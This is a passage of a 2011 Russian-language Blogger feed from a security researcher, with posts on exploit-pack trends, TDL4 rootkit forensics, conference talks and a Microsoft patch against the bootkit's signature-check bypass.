Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-PAj2ZI3mNE8/ThHzAt_TixI/AAAAAAAAA3s/z80DaG396dU/s72-c/p2p.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-9091599065804533014</id><published>2011-07-04T17:17:00.002+04:00</published><updated>2011-07-06T14:09:30.983+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Наиболее распространенные эсплойт паки</title><content type='html'>&lt;div style="text-align: justify;"&gt;Попалась сегодня на глаза интересная инфографика на тему распространенных нынче связок эксплойтов:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-KCtPVSpK9nE/ThG8FiL5WFI/AAAAAAAAA3k/p3u_Lr3GZh8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-KCtPVSpK9nE/ThG8FiL5WFI/AAAAAAAAA3k/p3u_Lr3GZh8/s320/1.png" width="217" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;На &lt;a href="http://www.kahusecurity.com/wp-content/uploads/2011/07/wildwildwest_07111.jpg"&gt;оригинальной картинке&lt;/a&gt; еще приведены ныне уже почившие, но когда то очень даже популярные наборы эксплойтов. Как показывает наша статистика во всех этих связках используются далеко не 0-day уязвимости, а вполне приличный пробив обеспечивают баяны из группы Flash/PDF/Java.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-9091599065804533014?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/9091599065804533014/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/07/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9091599065804533014'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9091599065804533014'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/07/blog-post.html' title='Наиболее распространенные эсплойт паки'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-KCtPVSpK9nE/ThG8FiL5WFI/AAAAAAAAA3k/p3u_Lr3GZh8/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8326045684274223989</id><published>2011-06-03T19:13:00.002+04:00</published><updated>2011-08-23T20:19:01.534+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='CONFidence'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Bochs'/><title type='text'>Криминалистический анализ TDL4 и TdlFsReader</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;С сегодняшнего дня обновленный TdlFsReader (hxxp://eset.ru/tools/TdlFsReader.exe) пошел на паблик. Поддерживаются все известные модификации, как для x86, так и для x64.&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/iRpp6vn2DAE/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/iRpp6vn2DAE?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266" src="http://www.youtube.com/v/iRpp6vn2DAE?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Ну и чтобы закрыть вопрос с демками которые показывались на PHD и CONFidence, записано видео с отладкой кода буткита в TDL4, который, собственно, осуществляет обход проверки цифровой подписи в драйверах для x64 систем.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/sT6N7Dr-G6s/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/sT6N7Dr-G6s?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266" src="http://www.youtube.com/v/sT6N7Dr-G6s?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8326045684274223989?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8326045684274223989/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/06/tdl4-tdlfsreader.html#comment-form' title='Комментарии: 6'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8326045684274223989'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8326045684274223989'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/06/tdl4-tdlfsreader.html' title='Криминалистический анализ TDL4 и TdlFsReader'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>6</thr:total><georss:featurename>город Москва, Россия</georss:featurename><georss:point>55.755786 37.61763300000007</georss:point><georss:box>55.4907435 37.20096450000007 56.0208285 38.03430150000007</georss:box></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-9112285569071663101</id><published>2011-05-26T16:07:00.002+04:00</published><updated>2011-05-28T01:10:08.682+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FUN'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='CONFidence'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>CONFidence'2011 (Krakow)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-UVcE8OksaAY/Td45Pwhb3tI/AAAAAAAAA1k/M0ApWcOvjVM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="http://3.bp.blogspot.com/-UVcE8OksaAY/Td45Pwhb3tI/AAAAAAAAA1k/M0ApWcOvjVM/s320/1.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;div style="text-align: justify;"&gt;В последнее время мне довелось побывать на большом количестве конференций в качестве докладчика, но больше всего меня поразила CONFidence&amp;#39;2011 в Кракове. Организаторы этой конференции очень трепетно относятся ко всем докладчикам и готовы компенсировать им все расходы за перелет, гостиницу и такси в аэропорт. Помимо этого каждый день нас водили в какой-нибудь местный ресторан для ужина, чтобы докладчики могли познакомиться и пообщаться между собой. Ко всему прочему на самой конференции для докладчиков было бесплатное пиво и прочие радости :) Вообщем по мнению большинства опрошенных мной спикеров, все они сходятся во мнении, что на CONFidence организаторы больше всего любят докладчиков и таких условий больше нет нигде. Конечно же очевидна причина такого отношения, это необходимость привлечь как можно больше интересных докладов из разных стран.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/05/confidence2011-krakow.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-9112285569071663101?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/9112285569071663101/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/05/confidence2011-krakow.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9112285569071663101'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9112285569071663101'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/05/confidence2011-krakow.html' title='CONFidence&apos;2011 (Krakow)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-UVcE8OksaAY/Td45Pwhb3tI/AAAAAAAAA1k/M0ApWcOvjVM/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total><georss:featurename>Краков, Польша</georss:featurename><georss:point>50.0646501 19.94497990000002</georss:point><georss:box>49.9853636 19.73293090000002 50.1439366 20.15702890000002</georss:box></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5863647922199881578</id><published>2011-05-19T22:41:00.003+04:00</published><updated>2011-05-20T12:31:24.077+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FUN'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Впечатления от PHD</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Сегодня практически с самого начала я присутствовал на этом мероприятии. У входа мне удалось встретить знакомых из оргов и меня любезно провели миную огромную очередь страждущих попасть внутрь, чтобы я мог не торопясь подготовить оборудование для проведения мастер-класса &amp;quot;Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4&amp;quot;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;На самом деле наверное жестоко было мучить публику с утра по раньше хардкорными выкладками об внутреннем устройстве ОС и механизмах обхода проверок цифровой подписи :) Но выбора у меня не было, так как в полдень я уже должен был выдвигаться в аэропорт, но об этом расскажу позже. На удивление этот хардкор заинтересовал довольно многих и зал был наполнен целиков, включая проходы. Это крайне приятно, значит не зря было потрачено время на подготовку.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/05/phd.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5863647922199881578?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5863647922199881578/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/05/phd.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5863647922199881578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5863647922199881578'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/05/phd.html' title='Впечатления от PHD'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-760078209748835547</id><published>2011-05-18T23:40:00.003+04:00</published><updated>2011-05-18T23:44:06.606+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FUN'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Завтра PHD</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Xp7r5mu9_A8/TdQg2xHgQzI/AAAAAAAAA04/_a9DZbjgcsY/s1600/logo1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-Xp7r5mu9_A8/TdQg2xHgQzI/AAAAAAAAA04/_a9DZbjgcsY/s1600/logo1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Завтра пройдет долгожданное многими &lt;a href="http://phdays.ru/"&gt;мероприятие&lt;/a&gt; "Positive Hack Days", программа конференции выглядит довольно многообещающе. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Завтра всех призываю участвовать в нашем конкурсе по реверсингу, начало регистрации на него собственно стартует в 9:30, т.к. задание довольно интересное и требующее времени на решение. Кто первым добудет все кодовые фразы тот и получит главный приз. А всех участников конкурса ждут сувениры от ESET ;)&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Так же завтра с утра пройдет мой мастер-класс по теме "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4". Изначально он задумывался как двух часовой, но потом был урезан в связи ограничением по времени в один час по регламенту конференции. Поэтому сделать много  интерактива не получится, но все равно будет интересно:&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Эволюция современных руткит-программ&lt;/li&gt;&lt;li&gt;Этапы установки на x86/x64&lt;/li&gt;&lt;li&gt;Буткит и обход проверки подписи&lt;/li&gt;&lt;li&gt;Отладка буткита на эмуляторе Bochs&lt;/li&gt;&lt;li&gt;Хуки в режиме ядра&lt;/li&gt;&lt;li&gt;Отладка с использованием WinDbg&lt;/li&gt;&lt;li&gt;Файловая система TDL4&lt;/li&gt;&lt;li&gt;TdlFsReader, как инструмент криминалистической экспертизы&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-760078209748835547?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/760078209748835547/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/05/positive-hack-days.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/760078209748835547'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/760078209748835547'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/05/positive-hack-days.html' title='Завтра PHD'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-Xp7r5mu9_A8/TdQg2xHgQzI/AAAAAAAAA04/_a9DZbjgcsY/s72-c/logo1.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4753127282165198598</id><published>2011-05-16T21:37:00.002+04:00</published><updated>2011-05-28T01:11:08.368+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='SmartCard'/><category scheme='http://www.blogger.com/atom/ns#' term='CARO'/><title type='text'>CARO'2011 in Prague</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;В начале мая мне довелось побывать на довольно интересном мероприятии &lt;a href="http://caro2011.org/"&gt;CARO 2011 Workshop&lt;/a&gt;. В прошлом году я уже посещал эту конференцию у &lt;a href="http://amatrosov.blogspot.com/2010/05/caro2010_29.html"&gt;финов&lt;/a&gt;, но на этот раз мы представляли собственный доклад &amp;quot;Cybercrime in Russia: Trends and Issues&amp;quot;. Который мы готовили совместно с криминалистами из &lt;a href="http://group-ib.ru/"&gt;Group-IB&lt;/a&gt;.&lt;/div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-vz9Qj2rep_4/TdFbf-AgMmI/AAAAAAAAA0Y/mvglwhci4nY/s1600/IMG_1482.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-vz9Qj2rep_4/TdFbf-AgMmI/AAAAAAAAA0Y/mvglwhci4nY/s400/IMG_1482.JPG" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/05/caro2011-in-prague.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4753127282165198598?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4753127282165198598/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/05/caro2011-in-prague.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4753127282165198598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4753127282165198598'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/05/caro2011-in-prague.html' title='CARO&apos;2011 in Prague'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-vz9Qj2rep_4/TdFbf-AgMmI/AAAAAAAAA0Y/mvglwhci4nY/s72-c/IMG_1482.JPG' height='72' width='72'/><thr:total>2</thr:total><georss:featurename>Прага, Чехия</georss:featurename><georss:point>50.0878114 14.420459800000003</georss:point><georss:box>49.9702814 14.179827300000003 50.2053414 14.661092300000004</georss:box></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1223223670132828729</id><published>2011-05-05T01:13:00.001+04:00</published><updated>2011-05-11T12:21:24.418+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Новая модификация TDL4 обходит костыль MS Advisory (2506014)</title><content type='html'>Что собственно и следовало ожидать, в конце прошлой недели была обнаружена новая модификация TLD4 (Win32/Olmarik.AMN), которая  обходит вставленный &lt;a href="http://amatrosov.blogspot.com/2011/04/ms-advisory-2506014-x64.html"&gt;костыль&lt;/a&gt; от MS для противодействия используемому методу загрузки не подписанных дров (&lt;a href="http://www.virustotal.com/file-scan/report.html?id=b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5-1304168280"&gt;VT&lt;/a&gt;). Первая информация поэтому поводу появилась &lt;a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;p=6102#p6095"&gt;здесь&lt;/a&gt;, после чего достаточно оперативно Prevx написали неплохой &lt;a href="http://www.prevx.com/blog/172/TDL-rootkit-is-coming-back-stronger-than-before.html"&gt;блогпост&lt;/a&gt; по теме. &lt;br /&gt;&lt;br /&gt;По сути произошло два важных изменения, это механизм обхода костыля от MS и изменилась функциональность связанная с хуками (неплохой &lt;a href="http://blogs.mcafee.com/mcafee-labs/memory-forging-attempt-by-a-rootkit"&gt;блогпост&lt;/a&gt; от mcafee по теме), по всей видимости она была изменена для обхода существующих алгоритмов лечения.&lt;br /&gt;&lt;br /&gt;Update: наш официальный &lt;a href="http://blog.eset.com/2011/05/10/the-co-evolution-of-tdl4-to-bypass-the-windows-os-loader-patch-kb2506014"&gt;блогпост&lt;/a&gt; по теме "The co-evolution of TDL4 to bypass the Windows OS Loader patch (KB2506014 )"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1223223670132828729?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1223223670132828729/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/05/tdl4-ms-advisory-2506014.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1223223670132828729'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1223223670132828729'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/05/tdl4-ms-advisory-2506014.html' title='Новая модификация TDL4 обходит костыль MS Advisory (2506014)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total><georss:featurename>Aupark, 85101 Братислава-Petržalka, Словакия</georss:featurename><georss:point>48.1333835 17.10484389999999</georss:point><georss:box>47.90425 16.63792489999999 48.362517000000004 17.571762899999992</georss:box></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7951830949038929663</id><published>2011-04-13T19:57:00.002+04:00</published><updated>2011-04-15T13:40:53.437+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>MS Advisory (2506014) закрывает брешь для установки на x64 винде</title><content type='html'>Наконец дождались и MS стала прикрывать, мягко говоря очень не новые дыры, связанные с некоторыми методами обхода загрузки не подписанных дров для x64 винды. В частности в вышедшем вчера патче &lt;a href="http://www.microsoft.com/technet/security/advisory/2506014.mspx"&gt;MS Advisory (2506014)&lt;/a&gt; были внесены изменения в загрузчик winload.exe, которые препятствуют загрузки не подписанных драйверов TDL4. В процессе инсталляции руткита все происходит, как обычно, но вот после перезапуска системы его драйвера просто не будут загружены.&lt;br /&gt;&lt;br /&gt;Но стоит отметить, что этот путь к спасению, работает только для пользователей, которые будут подвержены заражению после этого патча. Тем, кого угораздило заразится ранее уже ничего не поможет :) Точнее TDL4 умеет блокировать доступ к серверам с обновлениями winupdate, поэтому получить заветный патч им будет нелегко.&lt;br /&gt;&lt;br /&gt;Ну и для общности картины надо отметить, что семейство китайских буткитов, дроппер которого мы детектим, как NSIS/TrojanClicker.Agent.BJ (&lt;a href="http://www.virustotal.com/file-scan/report.html?id=bc3ef8a3b36a98ffb0365d449ab63e7571a1b5790af44a22bf012c29a14abb3a-1302709737"&gt;VT&lt;/a&gt;), использует иные методы обхода проверки подписи, которые этим патчем не были закрыты.&lt;br /&gt;&lt;br /&gt;Update: Вышел наш блог пост "KB2506014 kills TDL4 on x64" в &lt;a href="http://blog.eset.com/2011/04/15/kb2506014-kills-tdl4-on-x64"&gt;официальном блоге&lt;/a&gt;, с более подробным объяснением случившегося.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7951830949038929663?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7951830949038929663/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/04/ms-advisory-2506014-x64.html#comment-form' title='Комментарии: 5'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7951830949038929663'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7951830949038929663'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/04/ms-advisory-2506014-x64.html' title='MS Advisory (2506014) закрывает брешь для установки на x64 винде'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5676415541338248751</id><published>2011-03-31T18:09:00.003+04:00</published><updated>2011-03-31T19:03:48.234+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>The Evolution of TDL: Conquering 